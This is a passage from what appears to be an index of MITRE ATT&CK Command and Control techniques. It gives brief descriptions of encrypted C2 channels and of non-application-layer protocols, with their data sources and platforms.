Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre